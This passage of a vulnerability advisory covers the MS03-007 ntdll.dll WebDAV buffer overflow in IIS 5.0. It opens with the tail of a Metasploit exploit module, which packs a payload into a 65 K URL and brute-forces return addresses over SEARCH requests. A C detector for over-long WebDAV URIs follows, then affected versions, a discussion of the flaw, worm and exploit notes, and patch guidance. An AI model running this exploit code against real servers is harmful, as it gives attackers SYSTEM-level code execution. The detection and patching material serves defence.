			"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
	
		if datastore['invalid_search_request'] == true
			xml = rand_text(rand(1024) + 32)
		end

		# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
		# This decodes to "inc ecx"
		
		url = 'A' * 65516
		url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
				
		targets.each { |ret|
			
			print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
			url[ 283, 2 ] = ret
	
			begin
				send_request_cgi({
					'uri'     => '/' + url,
					'ctype'   => 'text/xml',
					'method'  => 'SEARCH',
					'data'    => xml
				}, 5)
				handler
			rescue => e
				print_error("Attempt failed: #{e}")
			end
			
			1.upto(8) { |i|
				sleep(0.25)
				return if self.session_created?
			}
			
			if !service_running?
				print_error('Giving up, IIS must have completely crashed')
				return
			end
		}
	end

	# Try connecting to the server up to 20 times, with a two second gap
	# This gives the server time to recover after a failed exploit attempt
	def service_running?
		print_status('Checking if IIS is back up after a failed attempt...')
		1.upto(20) {|i|
			begin
				send_request_raw({'uri' => '/'}, 5)
			rescue
				print_status("Connection failed (#{i} of 20)...")
				sleep(2)
				next
			end
			return true
		}
		return false
	end

end
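Both exploits on this page, the Perl LOCK request above and the Metasploit SEARCH module just shown, share one observable: a WebDAV method carrying a URI of roughly 65 K characters, far beyond the 260-character MAX_PATH any real file under the webroot could have. The detector below is an added example, not code from the page or from Metasploit. It parses an HTTP request line, matches the method against the WebDAV verb set and flags the line when the URI exceeds a threshold. The 4096-character threshold, the method list and the sample request lines are constructed for the example. Caveat: the Perl exploit %u-encodes its URL, so on the wire every character is six ASCII bytes and the raw URI is longer still; a detector that decodes %u sequences first must apply the threshold to the decoded length, which is what IIS sees.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* WebDAV verbs (assumed list): the page's exploits use LOCK and SEARCH; the other
 * WebDAV methods reach the same IIS path-mapping code, so they are matched too. */
static const char *const kDavMethods[] = {
    "SEARCH", "LOCK", "UNLOCK", "PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", NULL
};

/* Assumption: any URI over this length is treated as hostile. Legitimate paths are
 * bounded by MAX_PATH (260); the exploits on this page send roughly 65 K characters. */
#define URI_LEN_THRESHOLD 4096u

/* Parse "METHOD SP URI [SP VERSION]". Returns 1 when the line pairs a WebDAV method
 * with an over-long URI, 0 otherwise (including malformed lines). Stores the URI
 * length in *uri_len_out when that pointer is non-NULL. */
int is_ms03007_request_line(const char *line, size_t *uri_len_out)
{
    const char *sp1 = strchr(line, ' ');
    if (!sp1 || sp1 == line) return 0;
    size_t mlen = (size_t)(sp1 - line);
    const char *uri = sp1 + 1;
    const char *end = strchr(uri, ' ');
    size_t ulen = end ? (size_t)(end - uri) : strlen(uri);
    if (uri_len_out) *uri_len_out = ulen;

    int dav = 0;
    for (const char *const *m = kDavMethods; *m; m++) {
        if (strlen(*m) == mlen && memcmp(*m, line, mlen) == 0) { dav = 1; break; }
    }
    return dav && ulen > URI_LEN_THRESHOLD;
}

/* Constructed sample: "METHOD /AAAA... HTTP/1.1" with a URI of 1 + uri_fill characters.
 * Caller frees the result. */
char *build_request_line(const char *method, size_t uri_fill)
{
    const char *tail = " HTTP/1.1";
    size_t mlen = strlen(method);
    char *buf = malloc(mlen + 2 + uri_fill + strlen(tail) + 1);
    if (!buf) return NULL;
    memcpy(buf, method, mlen);
    buf[mlen] = ' ';
    buf[mlen + 1] = '/';
    memset(buf + mlen + 2, 'A', uri_fill);
    strcpy(buf + mlen + 2 + uri_fill, tail);
    return buf;
}

/* Build one synthetic request line, classify it, free it. */
int check_synthetic_request(const char *method, size_t uri_fill)
{
    char *line = build_request_line(method, uri_fill);
    if (!line) return -1;
    int hit = is_ms03007_request_line(line, NULL);
    free(line);
    return hit;
}

/* Run the detector over a constructed four-line sample and return the number of hits:
 * two benign requests, a Metasploit-style SEARCH probe and a Perl-style LOCK probe. */
int scan_sample_log(void)
{
    static const char *const benign[] = {
        "GET /default.htm HTTP/1.0",
        "PROPFIND /webdav/ HTTP/1.1"          /* short DAV request: must not fire */
    };
    int hits = 0;
    for (size_t i = 0; i < 2; i++) hits += is_ms03007_request_line(benign[i], NULL);
    hits += check_synthetic_request("SEARCH", 65535);  /* like the module's check(): 'x' * 65535 */
    hits += check_synthetic_request("LOCK", 65516);    /* like the Perl exploit's LOCK URL */
    return hits;
}

int main(void)
{
    printf("requests flagged in constructed sample: %d\n", scan_sample_log());
    return 0;
}
```

scan_sample_log() returns 2 for the constructed sample: the two short requests pass, and the SEARCH and LOCK probes are flagged. On a real IIS 5.0 log the same rule can be applied to the cs-method and cs-uri-stem fields; tune the threshold against normal traffic before alerting on it.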
    

- Vulnerability Information

4467
Microsoft Windows WebDav ntdll.dll Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Uncoordinated Disclosure, Discovered in the Wild

- Vulnerability Description

Windows servers with WebDAV enabled contain a flaw that may allow a remote attacker to execute arbitrary code. The issue lies in the path conversion function in ntdll.dll that WebDAV calls, which does not properly bound-check its input. An attacker who sends a specially crafted request that reaches this function may be able to execute arbitrary code with SYSTEM privileges.

- Timeline

2003-05-30 2003-04-24
2003-05-30 Unknown

- Solution

Microsoft has released a patch to address this vulnerability. The following workarounds also mitigate the WebDAV attack vector (they do not fix the ntdll.dll flaw itself, which other vectors may reach): 1. Disable IIS if it is not required. 2. Disable WebDAV if it is not required.

- References

- Vulnerability Author

- Vulnerability Information

Microsoft Windows ntdll.dll Buffer Overflow Vulnerability
Class: Boundary Condition Error
BID: 7116
Remote: Yes
Local: No
Published: 2003-03-17 12:00:00
Updated: 2009-07-11 09:06:00
Credit: Announced by the vendor.

- Affected Program Versions

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 2000 Terminal Services SP3
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Cisco Wireless Lan Solution Engine
Cisco VPN/Security Management Solution
Cisco Voice Manager
Cisco User Registration Tool
Cisco uOne Enterprise Edition
Cisco Unity Server 4.0
Cisco Unity Server 3.3
Cisco Unity Server 3.2
Cisco Unity Server 3.1
Cisco Unity Server 3.0
Cisco Unity Server 2.46
Cisco Unity Server 2.4
Cisco Unity Server 2.3
Cisco Unity Server 2.2
Cisco Unity Server 2.1
Cisco Unity Server 2.0
Cisco Unity Server
Cisco Transport Manager
Cisco Trailhead
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SN 5420 Storage Router 1.1.3
Cisco SN 5420 Storage Router 1.1 (7)
Cisco SN 5420 Storage Router 1.1 (5)
Cisco SN 5420 Storage Router 1.1 (4)
Cisco SN 5420 Storage Router 1.1 (3)
Cisco SN 5420 Storage Router 1.1 (2)
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0
Cisco Small Network Management Solution
Cisco Service Management
Cisco Secure Scanner
Cisco Secure Policy Manager 3.0.1
Cisco Secure Access Control Server 3.2.1
Cisco Routed Wan Management
Cisco QoS Policy Manager
Cisco Personal Assistant
Cisco Networking Services for Active Directory
Cisco Network Registar
Cisco Media Blender
Cisco Lan Management Solution
Cisco IP/VC 3540 Video Rate Matching Module
Cisco IP/VC 3540 Application Server
Cisco IP Telephony Environment Monitor
Cisco IP Contact Center Express
Cisco IP Contact Center Enterprise
Cisco Internet Service Node
Cisco Intelligent Contact Manager 5.0
Cisco Intelligent Contact Manager
Cisco Emergency Responder
Cisco E-Mail Manager
Cisco Dynamic Content Adapter
Cisco DOCSIS CPE Configurator
Cisco Customer Response Application Server
Cisco Conference Connection
Cisco Collaboration Server
Cisco CiscoWorks VPN/Security Management Solution
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco Building BroadBand Service Manager Hotspot 1.0
Cisco Building Broadband Service Manager (BBSM) 5.2
Cisco Building Broadband Service Manager (BBSM) 5.1
Cisco Broadband Troubleshooter
Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- Unaffected versions

Cisco Secure Access Control Server 3.2.2
Cisco Secure Access Control Server 3.2 (1.20)

- Vulnerability discussion

The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker.

Several other library functions which call the vulnerable ntdll.dll procedure have been identified. Administrators are advised to patch as other attack vectors are likely to surface.

** Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems. Windows XP also does not include WebDAV by default, but other attack vectors may be possible, especially in cases where the attacker has interactive access to the system. WebDAV may be installed by a user on Windows XP with IIS 5.1, so WebDAV may be a possible means of exploitation in these circumstances.

** Reports suggest that numerous hosts have been scanned in an attempt to exploit this vulnerability. Although unconfirmed, this may be the result of a system of automated attacks.

** It has been reported that this vulnerability is also present in the "RtlGetFullPathName_U" function. The supplied Microsoft patch (Q815021) also corrects this function.

** It has been reported that the W32.Welchia.Worm, described in MCID 1811, is actively exploiting this vulnerability.

- Exploit

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A proof-of-concept worm for WebDAV has been released, but is not known to be circulating in the wild at this time.

An exploit has been released as part of the Metasploit Framework 2.0.

The following exploits are available:

- Solution

Some reports indicate that the Microsoft patches for this issue may cause problems. It is not known if this is the result of the patches conflicting with certain configurations. Administrators are advised to apply workaround procedures if problems are experienced after applying the patch.

Microsoft has updated the bulletin with information regarding possible sources of conflicts with this patch. For precise details, see the Caveats section under Additional information about this patch in the Microsoft Security Bulletin.

Microsoft has revised its advisory to state that this vulnerability affects Windows NT systems. As Windows NT does not support WebDAV, exploits using WebDAV as the attack vector will not be effective against Windows NT systems.

Microsoft has released a new revision of the advisory which contains patches for Windows XP.

Microsoft has released fixes for the following:

Microsoft Windows 2000 Terminal Services SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Cisco Conference Connection
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Terminal Services
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows XP Home SP1
Cisco IP Contact Center Express
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows NT Server 4.0 SP6a
Cisco Internet Service Node
Cisco Call Manager 1.0
Cisco Call Manager 3.0
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.3 (3)
Cisco Building Broadband Service Manager (BBSM) 5.1

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.